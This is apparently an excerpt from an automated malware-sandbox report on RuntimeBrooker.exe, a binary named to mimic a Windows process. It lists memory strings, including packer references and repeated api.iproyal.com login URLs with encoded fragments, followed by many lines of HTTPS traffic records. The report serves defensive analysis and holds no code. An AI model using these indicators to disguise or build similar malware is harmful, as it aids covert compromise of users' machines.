Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000A2000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.esTWCA
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: RuntimeBrooker.exe, 00000007.00000002.1326236620.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359302875.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393176430.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424722305.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1482658369.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1523871329.00000000007E9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: RuntimeBrooker.exe, 0000001A.00000002.1523871329.00000000007E9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C000100000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C000100000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0B1
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.accv.es00
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com
Source: RuntimeBrooker.exe, 00000007.00000002.1326236620.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359302875.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393176430.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424722305.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1482658369.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1523871329.00000000007E9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://api.iproyal.com/https://api6.my-ip.io/ipidna:
Source: RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000118000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C000075000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C00016E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com/v1/users/login
Source: RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C0001C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==7m9fHZvLPTY2pWRLrSiq0MGQOl
Source: RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==8
Source: RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001F8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==AfWgpX0XnpfyEMMJtmlM3HjxKy
Source: RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C000240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==ExesL3jCExiRYi82g3ylkSM5T1
Source: RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C000240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==aBIXFxptU/GajKlpXI1iJgM4u7
Source: RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C000240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==kqGk19
Source: RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1364194145.000000C0002A4000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C000292000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com/v1/users/loginPost
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com1714047672worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem
Source: RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com1714047675worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllCommon
Source: RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000A2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com1714047679worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem
Source: RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com1714047682worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem
Source: RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com1714047687worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem
Source: RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com1714053685worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem
Source: RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.com1714053689worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem
Source: RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.comCommonProgramFiles=C:
Source: RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000A2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.iproyal.comt
Source: RuntimeBrooker.exe, 00000007.00000000.1308218803.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000000.1340333174.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000000.1373941660.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000000.1405591014.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000000.1457409512.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000000.1504929919.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000000.1539068961.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp	String found in binary or memory: https://enigmaprotector.com/taggant/spv.crl0
Source: RuntimeBrooker.exe, 00000007.00000000.1308218803.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000000.1340333174.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000000.1373941660.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000000.1405591014.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000000.1457409512.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000000.1504929919.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000000.1539068961.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp	String found in binary or memory: https://enigmaprotector.com/taggant/user.crl0
Source: RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
